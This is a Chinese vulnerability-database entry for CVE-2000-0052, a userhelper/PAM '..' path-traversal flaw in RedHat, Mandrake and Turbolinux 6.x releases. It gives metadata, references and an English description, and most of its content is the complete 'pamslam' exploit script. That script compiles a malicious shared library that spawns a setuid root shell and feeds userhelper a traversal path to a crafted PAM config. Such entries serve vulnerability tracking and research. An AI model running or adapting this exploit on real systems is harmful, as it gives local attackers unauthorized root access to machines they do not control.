多个Linux供应商userhelper/PAM路径漏洞

多个Linux供应商userhelper/PAM路径漏洞

漏洞ID 1105676 漏洞类型 输入验证
发布时间 2000-01-04 更新时间 2005-05-02
图片[1]-多个Linux供应商userhelper/PAM路径漏洞-安全小百科CVE编号 CVE-2000-0052
图片[2]-多个Linux供应商userhelper/PAM路径漏洞-安全小百科CNNVD-ID CNNVD-200001-018
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-018
|漏洞详情
RedHatusermode包中的userhelper程序存在漏洞。本地用户可以借助PAM和..(点点)攻击提升根访问权。
|漏洞EXP
Mandrake 6.0/6.1,RedHat 6.0/6.1,Turbolinux 3.5 b2/4.2/4.4/6.0.2 userhelper/PAM Path Vulnerability (1)

source: http://www.securityfocus.com/bid/913/info

Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths and userhelper allows you to specifiy a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specifiy a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/ but also follows ".." directories -- to an attacker's custom pam configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM.

This vulnerability also affects Mandrake Linux versions 6.0 and 6.1, as well as versions of TurboLinux Linux, version 6.0.2 and prior.


#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by [email protected]
#  
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#    being setuid means we can get root. 
#
# fix: 
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper 
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.

cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\trequired\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O

rm _pamslam.c
rm _pamslam.o

echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

rm _pamslam.so
rm _pamslam.conf
|参考资料

来源:XF
名称:linux-pam-userhelper
链接:http://xforce.iss.net/search.php3?type=2&pattern;=linux-pam-userhelper
来源:BID
名称:913
链接:http://www.securityfocus.com/bid/913
来源:REDHAT
名称:RHSA-2000:001
链接:http://www.redhat.com/support/errata/RHSA-2000-001.html
来源:L0PHT
名称:20000104PamSlam
链接:http://www.l0pht.com/advisories/pam_advisory

相关推荐: Ethereal 0.10.9 (Linux) – ‘3G-A11’ Remote Buffer Overflow

Ethereal 0.10.9 (Linux) – ‘3G-A11’ Remote Buffer Overflow 漏洞ID 1054967 漏洞类型 发布时间 2005-03-14 更新时间 2005-03-14 CVE编号 N/A CNNVD-ID N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享